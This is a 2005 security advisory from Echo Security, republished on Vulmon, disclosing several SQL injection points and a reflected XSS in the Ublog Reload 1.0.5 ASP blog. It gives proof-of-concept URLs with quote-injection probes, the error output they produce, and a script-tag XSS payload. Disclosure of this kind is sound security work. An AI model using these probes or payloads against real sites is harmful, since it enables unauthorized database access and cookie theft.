Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Echo Security Advisory 2005.18

Related Vulnerabilities:
Publish Date: 21 Jun 2005
Author: Echo Security, Dedi Dwianto, echo.or.id
Source 
                							

                ---------------------------------------------------------------------------
[ECHO_ADV_18$2005] Multiple SQL INJECTION in Ublog Reload 1.0.5
---------------------------------------------------------------------------

Author: Dedi Dwianto
Date: June, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv18-theday-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Ublog Reload
version : 1.0.5
url : http://www.uapplication.com/
Author:  uapplication
Description: 

Ublog Reload is a complete weblog system write base asp.I Found Multiple
Sql Injection Attack in this application.

---------------------------------------------------------------------------

Vulnerabilitie:
~~~~~~~~~~~~~~~~

A. SQL Injection
  
     * http://victim/UblogReload/index.asp?ci=[SQL INJECT][id]&s=category
   
     ex :
     http://victim/UblogReload/index.asp?ci='62&s=category
     
     Error :
     Microsoft VBScript runtime error '800a000d' 
     Type mismatch: 'cint' 

     /UblogReload/index.asp, line 41


    * http://victim/UblogReload/index.asp?d=[id][SQL Inject]&m=[mouth]&y=[year]&s=day
     
     ex :
     http://victim/UblogReload/index.asp?d=11'&m=6&y=2005&s=day

     Error :
     Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 
     [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Day(data) = 11' AND Month(data) = 6 AND Year(data) = 2005 ORDER BY data DESC;'. 

     /UblogReload/index.asp, line 101


   * http://victim/UblogReload/blog_comment.asp?bi=71&m=6&y=[year][SQL Inject]&d=&s=category

     Ex :
     http://victim/UblogReload/blog_comment.asp?bi=71&m=6&y=2005'&d=&s=category
      
     Error :
     
     Microsoft VBScript runtime error '800a000d' 

     Type mismatch: 'iThisYear' 

     /UblogReload/include/calendar.asp, line 7

    
    * http://victim/UblogReload/index.asp?m=[mount][SQL Inject]&y=[year]&s=month
      
      Ex :
      http://victim/UblogReload/index.asp?m=6'&y=2005&s=month

      Error :
     
      Microsoft VBScript runtime error '800a000d' 
      Type mismatch: 'cint' 
      /UblogReload/include/functions_format_datetime.asp, line 26


    * http://victim/UblogReload/index.asp?ui=[user ID][SQL Inject]&s=bloggers



And XSS 
POC :
     http://victim/UblogReload/trackback.asp?bi=[id]&btitle=[XSS]&mode=view
     http://victim/UblogReload/trackback.asp?bi=343&btitle=<script>alert('document.cookie')</script>&mode=view

B. Fix
   Sorry I can't give solution because i can't view source code becase that's commersial Software.
   Contact vendor No response.

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ Lieur Euy , MSR
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     the_day || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started